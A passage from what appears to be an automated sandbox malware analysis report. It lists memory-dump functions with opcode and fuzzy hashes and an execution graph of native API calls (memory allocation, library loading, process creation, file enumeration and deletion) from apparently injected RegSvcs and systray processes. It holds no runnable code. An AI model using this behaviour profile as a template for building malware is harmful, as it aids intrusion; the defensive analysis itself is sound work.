                                                                  • Associated: 00000011.00000002.2710676018.0000000001947000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000011.00000002.2710676018.00000000019C0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000011.00000002.2710676018.00000000019C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000011.00000002.2710676018.0000000001A02000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000011.00000002.2710676018.0000000001A63000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000011.00000002.2710676018.0000000001A69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_17_2_1940000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID: DebugPrintTimes
                                                                  • String ID: $$$
                                                                  • API String ID: 3446177414-233714265
                                                                  • Opcode ID: 39d7efbb71797136b53508b94477afc4410bfaf0522aa453a7b5ce2330f2ef45
                                                                  • Instruction ID: fed6de7d2896853cfc373b71c1409bb8de27b6328a3b890caf2c10d29b2a422c
                                                                  • Opcode Fuzzy Hash: 39d7efbb71797136b53508b94477afc4410bfaf0522aa453a7b5ce2330f2ef45
                                                                  • Instruction Fuzzy Hash: 6B51CD75A00246DFDF25EFADC584B9EBBF2BF98304F244059C90D6B292D770A846CB91
                                                                  Function 019FCEA0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 134COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • @_EH4_CallFilterFunc@8.LIBCMT ref: 019FCFBD
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000011.00000002.2710676018.00000000019C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 01940000, based on PE: true
                                                                  • Associated: 00000011.00000002.2710676018.0000000001940000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000011.00000002.2710676018.0000000001947000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000011.00000002.2710676018.0000000001966000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000011.00000002.2710676018.00000000019C0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000011.00000002.2710676018.0000000001A02000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000011.00000002.2710676018.0000000001A63000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000011.00000002.2710676018.0000000001A69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_17_2_1940000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID: CallFilterFunc@8
                                                                  • String ID: @$@4Dw@4Dw
                                                                  • API String ID: 4062629308-3936743583
                                                                  • Opcode ID: 5eb518743052aab87e2aa77137dc3d23a0377449175007ec48f92544f21083e7
                                                                  • Instruction ID: 5039b295db67b09387a4b47c02cf91058eb6d00694424a13fb40814b40bdea0e
                                                                  • Opcode Fuzzy Hash: 5eb518743052aab87e2aa77137dc3d23a0377449175007ec48f92544f21083e7
                                                                  • Instruction Fuzzy Hash: 04419E75900219EFDB219FA9C840AADFBF8FF95B00F04442EEA19DB265D734D901CB61
                                                                  Function 019EFD82 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 109timeCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000011.00000002.2710676018.00000000019C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 01940000, based on PE: true
                                                                  • Associated: 00000011.00000002.2710676018.0000000001940000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000011.00000002.2710676018.0000000001947000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000011.00000002.2710676018.0000000001966000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000011.00000002.2710676018.00000000019C0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000011.00000002.2710676018.0000000001A02000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000011.00000002.2710676018.0000000001A63000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000011.00000002.2710676018.0000000001A69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_17_2_1940000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID: DebugPrintTimes
                                                                  • String ID: $
                                                                  • API String ID: 3446177414-3993045852
                                                                  • Opcode ID: 0e44b45482db60958355c5b96f568a482d036f9d34b21bcd6151694c22d84f20
                                                                  • Instruction ID: d95f8d9c6767c189b6b43483ea12d7d69913a82015529b52550a79ea179c00e6
                                                                  • Opcode Fuzzy Hash: 0e44b45482db60958355c5b96f568a482d036f9d34b21bcd6151694c22d84f20
                                                                  • Instruction Fuzzy Hash: 50418D75A01209ABDF12DF99D884AEEBBF9BF48704F14005AED08A7341D771A951CB90
                                                                  Function 0196DF81 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 109timeCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000011.00000002.2710676018.0000000001966000.00000040.00001000.00020000.00000000.sdmp, Offset: 01940000, based on PE: true
                                                                  • Associated: 00000011.00000002.2710676018.0000000001940000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000011.00000002.2710676018.0000000001947000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000011.00000002.2710676018.00000000019C0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000011.00000002.2710676018.00000000019C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000011.00000002.2710676018.0000000001A02000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000011.00000002.2710676018.0000000001A63000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000011.00000002.2710676018.0000000001A69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_17_2_1940000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID: DebugPrintTimes
                                                                  • String ID: 0$0
                                                                  • API String ID: 3446177414-203156872
                                                                  • Opcode ID: 92a9c7964d2205921a93a7d05a77fcb8cdc45df500125fa54e8fb732917c421f
                                                                  • Instruction ID: 4deeee844319e7fca43c75b6a50838e0763db80be68b14abc740e43b372521a2
                                                                  • Opcode Fuzzy Hash: 92a9c7964d2205921a93a7d05a77fcb8cdc45df500125fa54e8fb732917c421f
                                                                  • Instruction Fuzzy Hash: CE415CB5608706AFD311CF68C584A56BBE8BB8C714F04492EF58CDB341D771E905CBA6

                                                                  Execution Graph

                                                                  Execution Coverage:2.8%
                                                                  Dynamic/Decrypted Code Coverage:4.3%
                                                                  Signature Coverage:1.6%
                                                                  Total number of Nodes:439
                                                                  Total number of Limit Nodes:70
                                                                  execution_graph 90337 abb620 90340 adb650 90337->90340 90339 abcc91 90343 ad9770 90340->90343 90342 adb681 90342->90339 90344 ad9808 90343->90344 90346 ad979e 90343->90346 90345 ad981e NtAllocateVirtualMemory 90344->90345 90345->90342 90346->90342 90347 ab9f20 90350 aba240 90347->90350 90349 aba5fb 90350->90349 90351 adb340 90350->90351 90352 adb366 90351->90352 90357 ab4180 90352->90357 90354 adb372 90356 adb3ab 90354->90356 90360 ad5750 90354->90360 90356->90349 90364 ac3350 90357->90364 90359 ab418d 90359->90354 90361 ad57b2 90360->90361 90363 ad57bf 90361->90363 90388 ac1b20 90361->90388 90363->90356 90365 ac336a 90364->90365 90367 ac3383 90365->90367 90368 ada060 90365->90368 90367->90359 90370 ada07a 90368->90370 90369 ada0a9 90369->90367 90370->90369 90375 ad8c50 90370->90375 90376 ad8c6d 90375->90376 90382 4b12c0a 90376->90382 90377 ad8c99 90379 adb6e0 90377->90379 90385 ad9980 90379->90385 90381 ada122 90381->90367 90383 4b12c11 90382->90383 90384 4b12c1f LdrInitializeThunk 90382->90384 90383->90377 90384->90377 90386 ad999a 90385->90386 90387 ad99ab RtlFreeHeap 90386->90387 90387->90381 90389 ac1b5b 90388->90389 90404 ac7fc0 90389->90404 90391 ac1b63 90402 ac1e46 90391->90402 90415 adb7c0 90391->90415 90393 ac1b79 90394 adb7c0 RtlAllocateHeap 90393->90394 90395 ac1b8a 90394->90395 90396 adb7c0 RtlAllocateHeap 90395->90396 90398 ac1b9b 90396->90398 90403 ac1c35 90398->90403 90429 ac6b60 NtClose LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk 90398->90429 90400 ac1df2 90425 ad8090 90400->90425 90402->90363 90418 ac46a0 90403->90418 90405 ac7fec 90404->90405 90430 ac7eb0 90405->90430 90408 ac8019 90412 ac8024 90408->90412 90436 ad9610 90408->90436 90409 ac8031 90411 ac804d 90409->90411 90413 ad9610 NtClose 90409->90413 90411->90391 90412->90391 90414 ac8043 90413->90414 90414->90391 90444 ad9930 90415->90444 90417 adb7db 90417->90393 90420 ac46c4 90418->90420 90419 ac46cb 90419->90400 90420->90419 90422 ac46ea 90420->90422 90447 adcb60 LdrLoadDll 90420->90447 90423 ac4717 90422->90423 90424 ac4700 LdrLoadDll 90422->90424 90423->90400 90424->90423 90426 ad80f1 90425->90426 90428 ad80fe 90426->90428 90448 ac1e60 90426->90448 90428->90402 90429->90403 90431 ac7eca 90430->90431 90435 ac7fa6 90430->90435 90439 ad8cf0 90431->90439 90434 ad9610 NtClose 90434->90435 90435->90408 90435->90409 90437 ad962a 90436->90437 90438 ad963b NtClose 90437->90438 90438->90412 90440 ad8d0a 90439->90440 90443 4b135c0 LdrInitializeThunk 90440->90443 90441 ac7f9a 90441->90434 90443->90441 90445 ad994d 90444->90445 90446 ad995e RtlAllocateHeap 90445->90446 90446->90417 90447->90422 90464 ac8290 90448->90464 90450 ac1e80 90457 ac23c7 90450->90457 90468 ad1290 90450->90468 90453 ac209a 90476 adc8b0 90453->90476 90454 ac1ede 90454->90457 90471 adc780 90454->90471 90457->90428 90458 ac20af 90460 ac20f9 90458->90460 90482 ac0970 90458->90482 90460->90457 90462 ac0970 LdrInitializeThunk 90460->90462 90485 ac8230 90460->90485 90461 ac8230 LdrInitializeThunk 90463 ac224a 90461->90463 90462->90460 90463->90460 90463->90461 90465 ac829d 90464->90465 90466 ac82be SetErrorMode 90465->90466 90467 ac82c5 90465->90467 90466->90467 90467->90450 90469 adb650 NtAllocateVirtualMemory 90468->90469 90470 ad12b1 90469->90470 90470->90454 90472 adc796 90471->90472 90473 adc790 90471->90473 90474 adb7c0 RtlAllocateHeap 90472->90474 90473->90453 90475 adc7bc 90474->90475 90475->90453 90477 adc820 90476->90477 90478 adc87d 90477->90478 90479 adb7c0 RtlAllocateHeap 90477->90479 90478->90458 90480 adc85a 90479->90480 90481 adb6e0 RtlFreeHeap 90480->90481 90481->90478 90483 ac0992 90482->90483 90489 ad98a0 90482->90489 90483->90463 90486 ac8243 90485->90486 90494 ad8b50 90486->90494 90488 ac826e 90488->90460 90490 ad98ba 90489->90490 90493 4b12c70 LdrInitializeThunk 90490->90493 90491 ad98e2 90491->90483 90493->90491 90495 ad8bd1 90494->90495 90497 ad8b7e 90494->90497 90499 4b12dd0 LdrInitializeThunk 90495->90499 90496 ad8bf6 90496->90488 90497->90488 90499->90496 90500 ac23e0 90501 ad8c50 LdrInitializeThunk 90500->90501 90502 ac2416 90501->90502 90505 ad96a0 90502->90505 90504 ac242b 90506 ad9732 90505->90506 90508 ad96ce 90505->90508 90510 4b12e80 LdrInitializeThunk 90506->90510 90507 ad9763 90507->90504 90508->90504 90510->90507 90521 ad9560 90522 ad95da 90521->90522 90524 ad958e 90521->90524 90523 ad95f0 NtDeleteFile 90522->90523 90527 ac28bf 90530 ac6400 90527->90530 90529 ac28dd 90531 ac6433 90530->90531 90532 ac6457 90531->90532 90537 ad9170 90531->90537 90532->90529 90534 ac647a 90534->90532 90535 ad9610 NtClose 90534->90535 90536 ac64fa 90535->90536 90536->90529 90538 ad918d 90537->90538 90541 4b12ca0 LdrInitializeThunk 90538->90541 90539 ad91b9 90539->90534 90541->90539 90542 ac7270 90543 ac728c 90542->90543 90545 ac72df 90542->90545 90543->90545 90546 ad9610 NtClose 90543->90546 90544 ac7417 90545->90544 90553 ac6690 NtClose LdrInitializeThunk LdrInitializeThunk 90545->90553 90547 ac72a7 90546->90547 90552 ac6690 NtClose LdrInitializeThunk LdrInitializeThunk 90547->90552 90549 ac73f1 90549->90544 90554 ac6860 NtClose LdrInitializeThunk LdrInitializeThunk 90549->90554 90552->90545 90553->90549 90554->90544 90555 acc730 90556 acc759 90555->90556 90557 acc85d 90556->90557 90558 acc803 FindFirstFileW 90556->90558 90558->90557 90561 acc81e 90558->90561 90559 acc844 FindNextFileW 90560 acc856 FindClose 90559->90560 90559->90561 90560->90557 90561->90559 90562 acf970 90563 acf9d4 90562->90563 90564 ac6400 2 API calls 90563->90564 90566 acfb07 90564->90566 90565 acfb0e 90566->90565 90591 ac6510 90566->90591 90568 acfcb3 90569 acfb8a 90569->90568 90570 acfcc2 90569->90570 90595 acf750 90569->90595 90572 ad9610 NtClose 90570->90572 90574 acfccc 90572->90574 90573 acfbc6 90573->90570 90575 acfbd1 90573->90575 90576 adb7c0 RtlAllocateHeap 90575->90576 90577 acfbfa 90576->90577 90578 acfc19 90577->90578 90579 acfc03 90577->90579 90604 acf640 CoInitialize 90578->90604 90580 ad9610 NtClose 90579->90580 90582 acfc0d 90580->90582 90583 acfc27 90607 ad90d0 90583->90607 90585 acfca2 90586 ad9610 NtClose 90585->90586 90587 acfcac 90586->90587 90589 adb6e0 RtlFreeHeap 90587->90589 90588 acfc45 90588->90585 90590 ad90d0 LdrInitializeThunk 90588->90590 90589->90568 90590->90588 90592 ac6535 90591->90592 90611 ad8f70 90592->90611 90596 acf76c 90595->90596 90597 ac46a0 2 API calls 90596->90597 90599 acf78a 90597->90599 90598 acf793 90598->90573 90599->90598 90600 ac46a0 2 API calls 90599->90600 90601 acf85e 90600->90601 90602 ac46a0 2 API calls 90601->90602 90603 acf8bb 90601->90603 90602->90603 90603->90573 90606 acf6a5 90604->90606 90605 acf73b CoUninitialize 90605->90583 90606->90605 90608 ad90ea 90607->90608 90616 4b12ba0 LdrInitializeThunk 90608->90616 90609 ad911a 90609->90588 90612 ad8f8a 90611->90612 90615 4b12c60 LdrInitializeThunk 90612->90615 90613 ac65a9 90613->90569 90615->90613 90616->90609 90617 ad0270 90618 ad028d 90617->90618 90619 ac46a0 2 API calls 90618->90619 90620 ad02ab 90619->90620 90621 ad9470 90622 ad9517 90621->90622 90624 ad949b 90621->90624 90623 ad952d NtReadFile 90622->90623 90625 4b12ad0 LdrInitializeThunk 90626 ac0f4b PostThreadMessageW 90627 ac0f5d 90626->90627 90628 ab9ec0 90630 ab9ecf 90628->90630 90629 ab9f10 90630->90629 90631 ab9efd CreateThread 90630->90631 90632 ad8a80 90633 ad8b0f 90632->90633 90635 ad8aab 90632->90635 90637 4b12ee0 LdrInitializeThunk 90633->90637 90634 ad8b40 90637->90634 90638 ad18c0 90639 ad18dc 90638->90639 90640 ad1918 90639->90640 90641 ad1904 90639->90641 90643 ad9610 NtClose 90640->90643 90642 ad9610 NtClose 90641->90642 90644 ad190d 90642->90644 90645 ad1921 90643->90645 90648 adb800 RtlAllocateHeap 90645->90648 90647 ad192c 90648->90647 90649 ad8c00 90650 ad8c1d 90649->90650 90653 4b12df0 LdrInitializeThunk 90650->90653 90651 ad8c45 90653->90651 90654 ad61c0 90655 ad621a 90654->90655 90657 ad6227 90655->90657 90658 ad3be0 90655->90658 90659 ad3be7 90658->90659 90660 adb650 NtAllocateVirtualMemory 90659->90660 90662 ad3c21 90660->90662 90661 ad3d2e 90661->90657 90662->90661 90663 ac46a0 2 API calls 90662->90663 90665 ad3c67 90663->90665 90664 ad3cb0 Sleep 90664->90665 90665->90661 90665->90664 90667 ad6120 LdrLoadDll LdrLoadDll Sleep NtAllocateVirtualMemory 90665->90667 90667->90665 90668 ad9300 90669 ad93ba 90668->90669 90671 ad9332 90668->90671 90670 ad93d0 NtCreateFile 90669->90670 90672 acfcd8 90673 acfc9d 90672->90673 90676 acfcdc 90672->90676 90674 acfcac 90673->90674 90675 ad9610 NtClose 90673->90675 90677 adb6e0 RtlFreeHeap 90674->90677 90675->90674 90678 acfcb3 90677->90678 90679 ac8957 90680 ac895a 90679->90680 90681 ac8911 90680->90681 90683 ac71f0 90680->90683 90684 ac7206 90683->90684 90686 ac723f 90683->90686 90684->90686 90687 ac7060 LdrLoadDll LdrLoadDll 90684->90687 90686->90681 90687->90686 90688 acae90 90693 acaba0 90688->90693 90690 acae9d 90707 aca810 90690->90707 90692 acaeb9 90694 acabc5 90693->90694 90718 ac84a0 90694->90718 90697 acad10 90697->90690 90699 acad27 90699->90690 90700 acad1e 90700->90699 90702 acae15 90700->90702 90737 aca260 90700->90737 90704 acae7a 90702->90704 90746 aca5d0 90702->90746 90705 adb6e0 RtlFreeHeap 90704->90705 90706 acae81 90705->90706 90706->90690 90708 aca826 90707->90708 90715 aca831 90707->90715 90709 adb7c0 RtlAllocateHeap 90708->90709 90709->90715 90710 aca852 90710->90692 90711 ac84a0 GetFileAttributesW 90711->90715 90712 acab75 90713 acab8e 90712->90713 90714 adb6e0 RtlFreeHeap 90712->90714 90713->90692 90714->90713 90715->90710 90715->90711 90715->90712 90716 aca260 RtlFreeHeap 90715->90716 90717 aca5d0 RtlFreeHeap 90715->90717 90716->90715 90717->90715 90719 ac84c1 90718->90719 90720 ac84d3 90719->90720 90721 ac84c8 GetFileAttributesW 90719->90721 90720->90697 90722 ad34a0 90720->90722 90721->90720 90723 ad34ae 90722->90723 90724 ad34b5 90722->90724 90723->90700 90725 ac46a0 2 API calls 90724->90725 90726 ad34ea 90725->90726 90727 ad34f9 90726->90727 90750 ad2f60 LdrLoadDll LdrLoadDll 90726->90750 90729 adb7c0 RtlAllocateHeap 90727->90729 90733 ad36a7 90727->90733 90730 ad3512 90729->90730 90731 ad369d 90730->90731 90730->90733 90734 ad352e 90730->90734 90732 adb6e0 RtlFreeHeap 90731->90732 90731->90733 90732->90733 90733->90700 90734->90733 90735 adb6e0 RtlFreeHeap 90734->90735 90736 ad3691 90735->90736 90736->90700 90738 aca286 90737->90738 90751 acdca0 90738->90751 90740 aca2fb 90742 aca480 90740->90742 90743 aca319 90740->90743 90741 aca465 90741->90700 90742->90741 90744 aca120 RtlFreeHeap 90742->90744 90743->90741 90756 aca120 90743->90756 90744->90742 90747 aca5f6 90746->90747 90748 acdca0 RtlFreeHeap 90747->90748 90749 aca67d 90748->90749 90749->90702 90750->90727 90753 acdcc4 90751->90753 90752 acdccd 90752->90740 90753->90752 90754 adb6e0 RtlFreeHeap 90753->90754 90755 acdd10 90754->90755 90755->90740 90757 aca13d 90756->90757 90760 acdd20 90757->90760 90759 aca243 90759->90743 90761 acdd44 90760->90761 90761->90761 90762 acddee 90761->90762 90763 adb6e0 RtlFreeHeap 90761->90763 90762->90759 90763->90762 90764 ac6ed0 90765 ac6efa 90764->90765 90768 ac8060 90765->90768 90767 ac6f24 90769 ac807d 90768->90769 90775 ad8d40 90769->90775 90771 ac80cd 90772 ac80d4 90771->90772 90780 ad8e20 90771->90780 90772->90767 90774 ac80fd 90774->90767 90776 ad8dde 90775->90776 90777 ad8d6e 90775->90777 90785 4b12f30 LdrInitializeThunk 90776->90785 90777->90771 90778 ad8e17 90778->90771 90781 ad8ed4 90780->90781 90782 ad8e52 90780->90782 90786 4b12d10 LdrInitializeThunk 90781->90786 90782->90774 90783 ad8f19 90783->90774 90785->90778 90786->90783 90787 ac7450 90788 ac7468 90787->90788 90790 ac74c2 90787->90790 90788->90790 90791 acb3c0 90788->90791 90792 acb3e6 90791->90792 90793 acb619 90792->90793 90818 ad9a10 90792->90818 90793->90790 90795 acb462 90795->90793 90796 adc8b0 2 API calls 90795->90796 90797 acb481 90796->90797 90797->90793 90798 acb555 90797->90798 90800 ad8c50 LdrInitializeThunk 90797->90800 90799 acb571 90798->90799 90801 ac5c90 LdrInitializeThunk 90798->90801 90807 acb601 90799->90807 90824 ad87c0 90799->90824 90802 acb4e3 90800->90802 90801->90799 90802->90798 90803 acb4ec 90802->90803 90803->90793 90804 acb53d 90803->90804 90805 acb51b 90803->90805 90821 ac5c90 90803->90821 90806 ac8230 LdrInitializeThunk 90804->90806 90839 ad48e0 LdrInitializeThunk 90805->90839 90811 acb54b 90806->90811 90809 ac8230 LdrInitializeThunk 90807->90809 90813 acb60f 90809->90813 90811->90790 90813->90790 90814 acb5d8 90829 ad8870 90814->90829 90816 acb5f2 90834 ad89d0 90816->90834 90819 ad9a2d 90818->90819 90820 ad9a3e CreateProcessInternalW 90819->90820 90820->90795 90822 ad8e20 LdrInitializeThunk 90821->90822 90823 ac5cce 90821->90823 90822->90823 90823->90805 90825 ad883d 90824->90825 90827 ad87eb 90824->90827 90840 4b139b0 LdrInitializeThunk 90825->90840 90826 ad8862 90826->90814 90827->90814 90830 ad889e 90829->90830 90831 ad88f0 90829->90831 90830->90816 90841 4b14340 LdrInitializeThunk 90831->90841 90832 ad8915 90832->90816 90835 ad8a4d 90834->90835 90836 ad89fb 90834->90836 90842 4b12fb0 LdrInitializeThunk 90835->90842 90836->90807 90837 ad8a72 90837->90807 90839->90804 90840->90826 90841->90832 90842->90837 90843 ac5d10 90844 ac8230 LdrInitializeThunk 90843->90844 90846 ac5d40 90844->90846 90847 ac5d6c 90846->90847 90848 ac81b0 90846->90848 90849 ac81f4 90848->90849 90854 ac8215 90849->90854 90855 ad8920 90849->90855 90851 ac8205 90852 ac8221 90851->90852 90853 ad9610 NtClose 90851->90853 90852->90846 90853->90854 90854->90846 90856 ad899d 90855->90856 90858 ad894b 90855->90858 90860 4b14650 LdrInitializeThunk 90856->90860 90857 ad89c2 90857->90851 90858->90851 90860->90857 90866 ad1c50 90871 ad1c69 90866->90871 90867 ad1cfc 90868 ad1cb4 90869 adb6e0 RtlFreeHeap 90868->90869 90870 ad1cc4 90869->90870 90871->90867 90871->90868 90872 ad1cf7 90871->90872 90873 adb6e0 RtlFreeHeap 90872->90873 90873->90867 90874 ac9d52 90875 ac9d5f 90874->90875 90876 adb6e0 RtlFreeHeap 90875->90876 90877 ac9d66 90875->90877 90876->90877 90878 ac3253 90879 ac7eb0 2 API calls 90878->90879 90880 ac3263 90879->90880 90881 ad9610 NtClose 90880->90881 90882 ac327f 90880->90882 90881->90882

                                                                  Executed Functions

                                                                  Function 00ACC730 Relevance: 4.6, APIs: 3, Instructions: 106fileCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • FindFirstFileW.KERNELBASE(?,00000000), ref: 00ACC814
                                                                  • FindNextFileW.KERNELBASE(?,00000010), ref: 00ACC84F
                                                                  • FindClose.KERNELBASE(?), ref: 00ACC85A
                                                                  Memory Dump Source
                                                                  • Source File: 00000013.00000002.4775040528.0000000000AB0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00AB0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_19_2_ab0000_systray.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Find$File$CloseFirstNext
                                                                  • String ID:
                                                                  • API String ID: 3541575487-0
                                                                  • Opcode ID: 3cd3e2681ba5a6a1b2d0cb57347a97e780a442727f0ef72e6805e2d903ca3fa1
                                                                  • Instruction ID: 0f158a9724f3c49563f52a0bfba2252b6c3584edd1555eadabc88d1843f35468
                                                                  • Opcode Fuzzy Hash: 3cd3e2681ba5a6a1b2d0cb57347a97e780a442727f0ef72e6805e2d903ca3fa1
                                                                  • Instruction Fuzzy Hash: 3A314375940208BBDB20DFA4CD86FFF777C9F44754F14449DF909A6181EA70AA858BA0
                                                                  Function 00AD9300 Relevance: 1.6, APIs: 1, Instructions: 101filenativeCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • NtCreateFile.NTDLL(?,?,A8038694,?,?,?,?,?,?,?,?), ref: 00AD9401
                                                                  Memory Dump Source
                                                                  • Source File: 00000013.00000002.4775040528.0000000000AB0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00AB0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_19_2_ab0000_systray.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: CreateFile
                                                                  • String ID:
                                                                  • API String ID: 823142352-0
                                                                  • Opcode ID: b959064142a78cb0671518204ab95d05372e63b6ea5b1fd54e98333cacff2101
                                                                  • Instruction ID: e84ddcf8c9869a210fc89d2659ba18e969906f002056033c311439fab26459ad
                                                                  • Opcode Fuzzy Hash: b959064142a78cb0671518204ab95d05372e63b6ea5b1fd54e98333cacff2101
                                                                  • Instruction Fuzzy Hash: 8731E2B5A01648AFDB14DF98D981EEFB7F9EF88304F108219F919A7340D730A951CBA0
                                                                  Function 00AD9470 Relevance: 1.6, APIs: 1, Instructions: 93filenativeCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • NtReadFile.NTDLL(?,?,A8038694,?,?,?,?,?,?), ref: 00AD9556
                                                                  Memory Dump Source
                                                                  • Source File: 00000013.00000002.4775040528.0000000000AB0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00AB0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_19_2_ab0000_systray.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: FileRead
                                                                  • String ID:
                                                                  • API String ID: 2738559852-0
                                                                  • Opcode ID: 05858e37e9e395ee33a9100e9f77f8ce24fca5febf1eff79fb2164b31e51fba1
                                                                  • Instruction ID: 33990582318bf813b878d63e444a60116339151cb48f760f7b7995c956570484
                                                                  • Opcode Fuzzy Hash: 05858e37e9e395ee33a9100e9f77f8ce24fca5febf1eff79fb2164b31e51fba1
                                                                  • Instruction Fuzzy Hash: 053103B5A01248AFDB14DF98C981EEFB7B9EF88304F10811AFD19A7344D730A911CBA1
                                                                  Function 00AD9770 Relevance: 1.6, APIs: 1, Instructions: 81memorynativeCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • NtAllocateVirtualMemory.NTDLL(00AC1EDE,?,A8038694,00000000,00000004,00003000,?,?,?,?,?,00AD80FE,00AC1EDE), ref: 00AD983B
                                                                  Memory Dump Source
                                                                  • Source File: 00000013.00000002.4775040528.0000000000AB0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00AB0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_19_2_ab0000_systray.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: AllocateMemoryVirtual
                                                                  • String ID:
                                                                  • API String ID: 2167126740-0
                                                                  • Opcode ID: 909f26f72666e9c96faafb94517615e42aeeb3c8665ab52f61d84f80faea3ca5
                                                                  • Instruction ID: d78ef683b5be9ddbbec20dc68d8e22c8d42eb16e8a0c042197192d39ff5821ab
                                                                  • Opcode Fuzzy Hash: 909f26f72666e9c96faafb94517615e42aeeb3c8665ab52f61d84f80faea3ca5
                                                                  • Instruction Fuzzy Hash: 142123B5A11648AFDB10DF98CC41EEFB7B9EF88300F00410AF919AB240D770A921CBA1
                                                                  Function 00AD9560 Relevance: 1.6, APIs: 1, Instructions: 61filenativeCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000013.00000002.4775040528.0000000000AB0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00AB0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_19_2_ab0000_systray.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: DeleteFile
                                                                  • String ID:
                                                                  • API String ID: 4033686569-0
                                                                  • Opcode ID: d131b7222b09d0d7006da3ee4aef3fe179894c2b8ff4099b04f06208ec93d2fe
                                                                  • Instruction ID: 05fe36d6cf32c9e48f74fa8553305ba5fe43c611c423715fe3d8684f7626fedc
                                                                  • Opcode Fuzzy Hash: d131b7222b09d0d7006da3ee4aef3fe179894c2b8ff4099b04f06208ec93d2fe
                                                                  • Instruction Fuzzy Hash: 2011A0716117087FE720EB58CD02FEBB3ADEF85714F004109FA09A7281DB716A1587A1
                                                                  Function 00AD9610 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 00AD9644
                                                                  Memory Dump Source
                                                                  • Source File: 00000013.00000002.4775040528.0000000000AB0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00AB0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_19_2_ab0000_systray.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Close
                                                                  • String ID:
                                                                  • API String ID: 3535843008-0
                                                                  • Opcode ID: 4b864a366b5b27e43805e6b99a6c495b5a065df10857e84a8a109e2f0984c103
                                                                  • Instruction ID: 6a80b2dbd884122c8373e2846df4ae8dd0074ae568291d612624995e461c79da
                                                                  • Opcode Fuzzy Hash: 4b864a366b5b27e43805e6b99a6c495b5a065df10857e84a8a109e2f0984c103
